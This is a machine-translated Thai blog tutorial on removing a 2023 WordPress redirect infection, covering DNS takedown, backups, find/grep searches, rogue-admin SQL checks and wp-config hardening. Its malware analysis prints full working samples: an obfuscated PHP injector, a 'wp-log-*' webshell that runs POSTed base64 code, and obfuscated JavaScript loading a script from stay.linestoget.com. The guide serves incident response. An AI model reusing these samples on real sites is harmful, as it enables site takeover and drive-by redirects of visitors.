Fix Redirect WordPress Hack 2023 (ไวรัสเปลี่ยนเส้นทาง)

WordPress เป็นแพลตฟอร์มที่มีคนใช้มากที่สุดอย่างแน่นอน CMS (Content Management System) สำหรับทั้งบล็อกและร้านค้าออนไลน์เริ่มต้น (พร้อมโมดูล WooCommerce) ซึ่งทำให้ตกเป็นเป้าหมายของการโจมตีทางคอมพิวเตอร์ (การแฮ็ก) มากที่สุด หนึ่งในการดำเนินการแฮ็คที่ใช้มากที่สุดมีเป้าหมายเพื่อเปลี่ยนเส้นทางเว็บไซต์ที่ถูกบุกรุกไปยังหน้าเว็บอื่น Redirect WordPress Hack 2023 เป็นมัลแวร์ที่ค่อนข้างใหม่ซึ่งมีผลกระทบในการเปลี่ยนเส้นทางเว็บไซต์ทั้งหมดไปยังหน้าเว็บที่เป็นสแปม หรืออาจทำให้คอมพิวเตอร์ของผู้ใช้ติดไวรัสได้

หากเว็บไซต์ของคุณพัฒนาบน WordPress ถูกเปลี่ยนเส้นทางไปยังไซต์อื่น มีแนวโน้มว่าจะตกเป็นเหยื่อของการแฮ็กการเปลี่ยนเส้นทางที่มีชื่อเสียงอยู่แล้ว

ในบทช่วยสอนนี้ คุณจะพบข้อมูลที่จำเป็นและคำแนะนำที่เป็นประโยชน์ซึ่งคุณสามารถกำจัดไวรัสของเว็บไซต์ที่ติดไวรัสด้วยการเปลี่ยนเส้นทางได้ WordPress Hack (Virus Redirect). คุณสามารถรับข้อมูลเพิ่มเติมหรือขอความช่วยเหลือผ่านความคิดเห็น

การตรวจจับไวรัสที่เปลี่ยนเส้นทางไซต์ WordPress

การลดลงอย่างกะทันหันและไม่ยุติธรรมของการเข้าชมเว็บไซต์ จำนวนคำสั่งซื้อที่ลดลง (ในกรณีของร้านค้าออนไลน์) หรือรายได้จากการโฆษณาเป็นสัญญาณแรกว่ามีบางอย่างผิดปกติ ตรวจจับ "Redirect WordPress Hack 2023” (Virus Redirect) ยังสามารถทำได้แบบ “มองเห็น” เมื่อคุณเปิดเว็บไซต์และคุณถูกเปลี่ยนเส้นทางไปยังหน้าเว็บอื่น

จากประสบการณ์ มัลแวร์เว็บส่วนใหญ่เข้ากันได้กับอินเทอร์เน็ตเบราว์เซอร์: Chrome, Firefox, Edge, Opera. หากคุณเป็นผู้ใช้คอมพิวเตอร์ Macไวรัสเหล่านี้ไม่สามารถมองเห็นได้ในเบราว์เซอร์ Safari. ระบบรักษาความปลอดภัยจาก Safari บล็อกสคริปต์ที่เป็นอันตรายเหล่านี้อย่างเงียบ ๆ

จะทำอย่างไรถ้าคุณมีเว็บไซต์ที่ติดไวรัส Redirect WordPress Hack

ฉันหวังว่าขั้นตอนแรกจะไม่ตื่นตระหนกหรือลบเว็บไซต์ แม้แต่ไฟล์ที่ติดไวรัสหรือไวรัสก็ไม่ควรลบออกในตอนแรก ประกอบด้วยข้อมูลอันมีค่าที่สามารถช่วยให้คุณเข้าใจว่าการละเมิดความปลอดภัยอยู่ที่ไหนและสิ่งใดที่ส่งผลต่อไวรัส วิธีการดำเนินการ

ปิดเว็บไซต์เป็นสาธารณะ

คุณจะปิดเว็บไซต์ไวรัสสำหรับผู้เยี่ยมชมได้อย่างไร? วิธีที่ง่ายที่สุดคือใช้ตัวจัดการ DNS และลบ IP สำหรับ "A" (ชื่อโดเมน) หรือกำหนด IP ที่ไม่มีอยู่จริง ดังนั้นผู้เยี่ยมชมเว็บไซต์จะได้รับการคุ้มครองจากสิ่งนี้ redirect WordPress hack ซึ่งอาจนำพวกเขาไปสู่ไวรัสหรือหน้าเว็บสแปม

ถ้าคุณใช้ CloudFlare ในฐานะผู้จัดการ DNS คุณลงชื่อเข้าใช้บัญชีและลบระเบียน DNS "A” สำหรับชื่อโดเมน ดังนั้นโดเมนที่ได้รับผลกระทบจากไวรัสจะยังคงอยู่โดยไม่มี IP และไม่สามารถเข้าถึงได้จากอินเทอร์เน็ตอีกต่อไป

คุณคัดลอก IP ของเว็บไซต์และ "กำหนดเส้นทาง" เพื่อให้มีเพียงคุณเท่านั้นที่สามารถเข้าถึงได้ จากคอมพิวเตอร์ของคุณ

วิธีเปลี่ยน IP จริงของเว็บไซต์บนคอมพิวเตอร์ Windows?

วิธีนี้มักใช้เพื่อบล็อกการเข้าถึงบางเว็บไซต์โดยแก้ไขไฟล์ "โฮสต์"

1. คุณเปิด Notepad หรือโปรแกรมแก้ไขข้อความอื่น ๆ (พร้อมสิทธิ์ administrator) และแก้ไขไฟล์ "hosts". ตั้งอยู่ใน:

C:\Windows\System32\drivers\etc\hosts

2. ในไฟล์ "โฮสต์" เพิ่ม "เส้นทาง" ให้กับ IP จริงของเว็บไซต์ของคุณ IP ลบด้านบนจากตัวจัดการ DNS

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. บันทึกไฟล์และเข้าถึงเว็บไซต์ในเบราว์เซอร์

หากเว็บไซต์ไม่เปิดขึ้นและคุณไม่ได้ทำอะไรผิดในไฟล์ "hosts" เป็นไปได้มากว่าแคช DNS

เพื่อล้างแคช DNS บนระบบปฏิบัติการ Windows, เปิด Command Promptที่คุณเรียกใช้คำสั่ง:

ipconfig /flushdns

วิธีเปลี่ยน IP จริงของเว็บไซต์บนคอมพิวเตอร์ Mac / Macหนังสือ?

สำหรับผู้ใช้คอมพิวเตอร์ Mac การเปลี่ยน IP จริงของเว็บไซต์ค่อนข้างง่ายกว่า

1. เปิดยูทิลิตี้ Terminal.

2. เรียกใช้บรรทัดคำสั่ง (ต้องใช้รหัสผ่านระบบเพื่อเรียกใช้):

sudo nano /etc/hosts

3. เช่นเดียวกับคอมพิวเตอร์ Windowsเพิ่ม IP จริงของโดเมน

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. บันทึกการเปลี่ยนแปลง Ctrl+X (y).

หลังจากที่คุณ "กำหนดเส้นทาง" แล้ว คุณเป็นคนเดียวที่สามารถเข้าถึงเว็บไซต์ที่ติดไวรัสได้ Redirect WordPress Hack.

การสำรองข้อมูลเว็บไซต์แบบเต็ม – ไฟล์และฐานข้อมูล

แม้จะติดเชื้อก็ตาม”redirect WordPress hack” คำแนะนำคือการสำรองข้อมูลทั่วไปของเว็บไซต์ทั้งหมด ไฟล์และฐานข้อมูล คุณอาจสามารถบันทึกสำเนาในเครื่องของทั้งสองไฟล์ได้ public / public_html ตลอดจนฐานข้อมูล

การระบุไฟล์ที่ติดไวรัสและไฟล์ที่ถูกแก้ไขโดย Redirect WordPress Hack 2023

ไฟล์เป้าหมายหลักของ WordPress มี index.php (ในราก), header.php, index.php şi footer.php ของธีม WordPress สินทรัพย์ ตรวจสอบไฟล์เหล่านี้ด้วยตนเองและระบุรหัสที่เป็นอันตรายหรือสคริปต์มัลแวร์

ในปี 2023 ไวรัสของ “Redirect WordPress Hack"ใส่ค่ะ index.php รหัสของแบบฟอร์ม:

(ฉันไม่แนะนำให้ใช้รหัสเหล่านี้!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

ถอดรหัสนี้ สคริปต์ที่เป็นอันตราย โดยพื้นฐานแล้วเป็นผลมาจากการที่เว็บไซต์ติดไวรัส WordPress. ไม่ใช่สคริปต์ที่อยู่เบื้องหลังมัลแวร์ แต่เป็นสคริปต์ที่ทำให้สามารถเปลี่ยนเส้นทางหน้าเว็บที่ติดไวรัสได้ ถ้าเราถอดรหัสสคริปต์ด้านบน เราจะได้:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Fix Redirect WordPress Hack 2023
Fix Redirect WordPress Hack 2023

หากต้องการระบุไฟล์ทั้งหมดบนเซิร์ฟเวอร์ที่มีรหัสนี้ คุณควรมีสิทธิ์เข้าถึง SSH ไปยังเซิร์ฟเวอร์เพื่อเรียกใช้การตรวจสอบไฟล์และบรรทัดคำสั่งการจัดการ Linux.

ที่เกี่ยวข้อง จะทราบได้อย่างไรว่าบล็อกของคุณติดไวรัสหรือไม่ ด้วยความช่วยเหลือ Google Search . (WordPress ไวรัส)

ด้านล่างนี้คือคำสั่งสองคำสั่งที่มีประโยชน์อย่างยิ่งในการระบุไฟล์และไฟล์ที่แก้ไขล่าสุดซึ่งมีรหัส (สตริง) บางอย่าง

คุณเห็นได้อย่างไร Linux ไฟล์ PHP มีการเปลี่ยนแปลงใน 24 ชั่วโมงที่ผ่านมาหรือกรอบเวลาอื่นหรือไม่

สั่งซื้อ “find” ใช้งานง่ายมากและอนุญาตให้ปรับแต่งเพื่อกำหนดช่วงเวลา เส้นทางการค้นหา และประเภทของไฟล์

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

ในเอาต์พุต คุณจะได้รับข้อมูลเกี่ยวกับวันที่และเวลาที่แก้ไขไฟล์ สิทธิ์เขียน / อ่าน / ดำเนินการ (chmod) และอยู่ในกลุ่ม/ผู้ใช้ใด

หากต้องการตรวจสอบวันที่ผ่านมาให้เปลี่ยนค่า "-mtime -1” หรือใช้ “-mmin -360” เป็นนาที (6 ชั่วโมง)

จะค้นหารหัส (สตริง) ภายในไฟล์ PHP, Java ได้อย่างไร

บรรทัดคำสั่ง "find" ที่ช่วยให้คุณสามารถค้นหาไฟล์ PHP หรือ Java ทั้งหมดที่มีรหัสบางอย่างได้อย่างรวดเร็วมีดังนี้:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

คำสั่งจะค้นหาและแสดงไฟล์ .php şi .js ที่มี "uJjBRODYsU"

ด้วยความช่วยเหลือของสองคำสั่งข้างต้น คุณจะพบได้อย่างง่ายดายว่าไฟล์ใดได้รับการแก้ไขเมื่อเร็วๆ นี้ และไฟล์ใดมีโค้ดมัลแวร์

ลบรหัสที่เป็นอันตรายออกจากไฟล์ที่แก้ไขโดยไม่สูญเสียรหัสที่ถูกต้อง ในสถานการณ์ของฉัน มัลแวร์ถูกวางก่อนที่จะเปิด <head>.

เมื่อรันคำสั่ง "find" คำสั่งแรก เป็นไปได้มากที่จะค้นพบไฟล์ใหม่บนเซิร์ฟเวอร์ ซึ่งไม่ใช่ของคุณ WordPress หรือใส่โดยคุณ ไฟล์ที่อยู่ในประเภทของไวรัส Redirect WordPress Hack.

ในสถานการณ์ที่ฉันตรวจสอบ ไฟล์ในรูปแบบ “wp-log-nOXdgD.php". ไฟล์เหล่านี้คือไฟล์ "spawn" ที่มีโค้ดมัลแวร์ที่ไวรัสใช้ในการเปลี่ยนเส้นทาง

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

วัตถุประสงค์ของไฟล์ประเภท "wp-log-*” คือการแพร่กระจายไวรัสแฮ็คการเปลี่ยนเส้นทางไปยังเว็บไซต์อื่น ๆ ที่โฮสต์บนเซิร์ฟเวอร์ เป็นรหัสมัลแวร์ประเภท “webshell” ประกอบด้วย ส่วนพื้นฐาน (ซึ่งมีการกำหนดตัวแปรเข้ารหัสบางตัว) และ o ส่วนการดำเนินการ ซึ่งผู้โจมตีพยายามโหลดและเรียกใช้รหัสที่เป็นอันตรายบนระบบ

หากมีตัวแปร POST ชื่อ 'bh' และค่าที่เข้ารหัส MD5 เท่ากับ "8f1f964a4b4d8d1ac3f0386693d28d03" จากนั้นสคริปต์จะปรากฏขึ้นเพื่อเขียนเนื้อหาที่เข้ารหัส base64 ของตัวแปรอื่นที่เรียกว่า 'b3' ในไฟล์ชั่วคราว จากนั้นพยายามรวมไฟล์ชั่วคราวนี้

หากมีตัวแปร POST หรือ GET ชื่อ 'tick' สคริปต์จะตอบกลับด้วยค่า MD5 ของสตริง "885"

ในการระบุไฟล์ทั้งหมดบนเซิร์ฟเวอร์ที่มีโค้ดนี้ ให้เลือกสตริงที่ใช้ร่วมกัน จากนั้นเรียกใช้คำสั่ง “find” (คล้ายกับด้านบน) ลบไฟล์ทั้งหมดที่มีรหัสมัลแวร์นี้.

ข้อบกพร่องด้านความปลอดภัยถูกโจมตีโดย Redirect WordPress Hack

ส่วนใหญ่ไวรัสเปลี่ยนเส้นทางนี้มาถึงทาง การแสวงหาผลประโยชน์ของผู้ใช้การบริหาร WordPress หรือโดยการระบุก ปลั๊กอินที่มีช่องโหว่ ซึ่งอนุญาตให้เพิ่มผู้ใช้ด้วยสิทธิ์ของ administrator.

สำหรับเว็บไซต์ส่วนใหญ่ที่สร้างบนแพลตฟอร์ม WordPress มันเป็นไปได้ แก้ไขไฟล์ธีมหรือปลั๊กอินจากอินเทอร์เฟซการดูแลระบบ (Dashboard). ดังนั้น ผู้ประสงค์ร้ายสามารถเพิ่มโค้ดมัลแวร์ลงในไฟล์ธีมเพื่อสร้างสคริปต์ที่แสดงด้านบน

ตัวอย่างของรหัสมัลแวร์ดังกล่าวคือ:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript ระบุไว้ในส่วนหัวของธีม WordPressทันทีที่เปิดฉลาก <head>.

ค่อนข้างยากที่จะถอดรหัส JavaScript นี้ แต่เห็นได้ชัดว่ามันสอบถามที่อยู่เว็บอื่นซึ่งมักจะเรียกสคริปต์อื่นเพื่อสร้างไฟล์ "wp-log-*” ที่ฉันพูดถึงข้างต้น

ค้นหาและลบรหัสนี้ออกจากไฟล์ทั้งหมด PHP ได้รับผลกระทบ

เท่าที่ฉันสามารถบอกได้ว่ารหัสนี้คือ เพิ่มด้วยตนเอง โดยผู้ใช้ใหม่ที่มีสิทธิ์ระดับผู้ดูแลระบบ

ดังนั้น เพื่อป้องกันการเพิ่มมัลแวร์จากแดชบอร์ด วิธีที่ดีที่สุดคือปิดใช้งานตัวเลือกในการแก้ไข WordPress ธีม / ปลั๊กอินจากแดชบอร์ด

แก้ไขไฟล์ wp-config.php และเพิ่มบรรทัด:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

หลังจากทำการเปลี่ยนแปลงนี้ ไม่มีผู้ใช้ WordPress คุณจะไม่สามารถแก้ไขไฟล์จากแดชบอร์ดได้อีกต่อไป

ตรวจสอบผู้ใช้ด้วยบทบาทของ Administrator

ด้านล่างนี้คือแบบสอบถาม SQL ที่คุณสามารถใช้เพื่อค้นหาผู้ใช้ที่มีบทบาทเป็น administrator ในแพลตฟอร์ม WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

ข้อความค้นหานี้จะส่งคืนผู้ใช้ทั้งหมดในตาราง wp_users ที่ได้รับมอบหมายบทบาทของ administrator. แบบสอบถามยังทำสำหรับตาราง wp_usermeta เพื่อค้นหาในเมตา 'wp_capabilities' ซึ่งมีข้อมูลเกี่ยวกับบทบาทของผู้ใช้

อีกวิธีหนึ่งคือการระบุจาก: Dashboard → Users → All Users → Administrator. อย่างไรก็ตาม มีวิธีปฏิบัติที่สามารถซ่อนผู้ใช้ในแผงแดชบอร์ดได้ ดังนั้นวิธีที่ดีที่สุดในการมองเห็นผู้ใช้ "Administrator"ใน WordPress เป็นคำสั่ง SQL ด้านบน

ในกรณีของฉัน ฉันระบุผู้ใช้ในฐานข้อมูลด้วยชื่อ "wp-import-user". ชี้นำค่อนข้างมาก

WP Malware ผู้ใช้ที่ไม่ดี
WP Malware ผู้ใช้ที่ไม่ดี

นอกจากนี้ คุณสามารถดูวันที่และเวลาของผู้ใช้ได้จากที่นี่ WordPress ถูกสร้าง. ID ผู้ใช้มีความสำคัญมากเช่นกัน เนื่องจากจะค้นหาบันทึกของเซิร์ฟเวอร์ ด้วยวิธีนี้ คุณสามารถดูกิจกรรมทั้งหมดของผู้ใช้รายนี้

ลบผู้ใช้ที่มีบทบาทเป็น administrator ซึ่งคุณไม่รู้แล้ว เปลี่ยนรหัสผ่าน สำหรับผู้ใช้ที่เป็นผู้ดูแลระบบทั้งหมด บรรณาธิการ ผู้เขียน Administrator.

เปลี่ยนรหัสผ่านของผู้ใช้ฐานข้อมูล SQL ของเว็บไซต์ที่ได้รับผลกระทบ

หลังจากทำตามขั้นตอนเหล่านี้แล้ว ผู้ใช้ทุกคนจะสามารถเริ่มต้นเว็บไซต์ใหม่ได้

อย่างไรก็ตาม โปรดจำไว้ว่าสิ่งที่ฉันนำเสนอข้างต้นอาจเป็นหนึ่งในหลายพันสถานการณ์ที่เว็บไซต์ติดไวรัส Redirect WordPress Hack ในปี 2023

หากเว็บไซต์ของคุณติดไวรัสและคุณต้องการความช่วยเหลือหรือหากคุณมีคำถามใดๆ ส่วนความคิดเห็นจะเปิดอยู่

เป็นคนรักเทคโนโลยี ฉันเขียนบทความด้วยความสุขบน StealthSettings.com ตั้งแต่ปี 2006 ฉันมีประสบการณ์ที่หลากหลายในระบบปฏิบัติการ: macOS, Windows, และ Linux, รวมถึงภาษาโปรแกรมและแพลตฟอร์มบล็อก (WordPress) และสำหรับร้านค้าออนไลน์ (WooCommerce, Magento, PrestaShop)

วิธีการ » WordPress » Fix Redirect WordPress Hack 2023 (ไวรัสเปลี่ยนเส้นทาง)
แสดงความคิดเห็น